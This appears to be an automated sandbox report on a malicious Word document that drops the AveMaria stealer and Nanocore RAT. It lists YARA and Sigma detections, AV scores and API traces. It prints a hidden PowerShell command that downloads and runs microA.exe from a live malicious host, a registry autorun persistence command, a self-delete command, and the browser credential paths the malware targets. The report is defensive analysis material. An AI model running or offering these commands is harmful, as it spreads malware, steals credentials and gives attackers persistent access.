12.2.microA.exe.33be930.10.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
12.2.microA.exe.33be930.10.unpack	AveMaria_WarZone	unknown	unknown	0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x16a74:$str2: MsgBox.exe 0x16948:$str6: Ave_Maria 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15608:$str8: SMTP Password 0x15fc0:$str12: \sqlmap.dll
12.2.microA.exe.232ff60.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0xae94:$a1: \Opera Software\Opera Stable\Login Data 0xb1bc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xab04:$a3: \Google\Chrome\User Data\Default\Login Data
12.2.microA.exe.232ff60.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.microA.exe.232ff60.7.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
12.2.microA.exe.232ff60.7.raw.unpack	AveMaria_WarZone	unknown	unknown	0xcf3c:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0xcc90:$str2: MsgBox.exe 0xcb64:$str6: Ave_Maria 0xc204:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0xb824:$str8: SMTP Password 0xab04:$str11: \Google\Chrome\User Data\Default\Login Data 0xc1dc:$str12: \sqlmap.dll
25.2.images.exe.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
25.2.images.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.2.images.exe.400000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
25.2.images.exe.400000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
11.2.microA.exe.34da100.12.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
11.2.microA.exe.34da100.12.unpack	AveMaria_WarZone	unknown	unknown	0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x16a74:$str2: MsgBox.exe 0x16948:$str6: Ave_Maria 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15608:$str8: SMTP Password 0x15fc0:$str12: \sqlmap.dll
10.2.microA.exe.2095f04.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0xae94:$a1: \Opera Software\Opera Stable\Login Data 0xb1bc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xab04:$a3: \Google\Chrome\User Data\Default\Login Data
10.2.microA.exe.2095f04.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 33 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', ProcessId: 2776

Sigma detected: PowerShell DownloadFile

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', ProcessId: 2776

Sigma detected: Direct Autorun Keys Modification

Show sources

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2648, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ProcessId: 2244

Sigma detected: Exploit for CVE-2017-0261

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, NewProcessName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, OriginalFileName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, ProcessId: 2532

Sigma detected: PowerShell Download from URL

Show sources

Source: Process started

Author: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', ProcessId: 2776

Sigma detected: Verclsid.exe Runs COM Object

Show sources

Source: Process started

Author: Victor Sergeev, oscd.community: Data: Command: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1948

Sigma detected: Group Modification Logging

Show sources

Source: Event Logs

Author: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-966771315-3019405637-367336477-1007, data 2: None, data 3: user-PC, data 4: S-1-5-21-966771315-3019405637-367336477-513, data 5: S-1-5-21-966771315-3019405637-367336477-1006, data 6: user, data 7: user-PC, data 8: 0x14825, data 9: -

Sigma detected: Local User Creation

Show sources

Source: Event Logs

Author: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: cIqnzxr, data 1: user-PC, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-966771315-3019405637-367336477-1007, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-966771315-3019405637-367336477-1006, data 4: user, data 5: user-PC, data 6: 0x14825, data 7: -, data 8: cIqnzxr, data 9: %%1793

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', ProcessId: 2776

Data Obfuscation:

Sigma detected: Powershell download and execute file

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'', ProcessId: 2776

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://hutyrtit.ydns.eu/microC.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://hutyrtit.ydns.eu/microC.exe

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files\Microsoft DN1\sqlmap.dll	Metadefender: Detection: 20%	Perma Link
Source: C:\Program Files\Microsoft DN1\sqlmap.dll	ReversingLabs: Detection: 42%
Source: C:\ProgramData\images.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\ProgramData\images.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe	ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\images.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\images.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\microA.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe	ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\microA.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Roaming\microA.exe	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Show sources

Source: N40-MR 311.doc

Virustotal: Detection: 43%

Perma Link

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\images.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\microA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\images.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe	Joe Sandbox ML: detected

Source: 25.2.images.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 17.2.microA.exe.400000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 16.2.microA.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 18.2.microA.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\images.exe	Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe	Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB* source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: images.exe
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2100227357.0000000001FB0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103552908.0000000002420000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb$ source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00411446 FindFirstFileW,FindNextFileW,
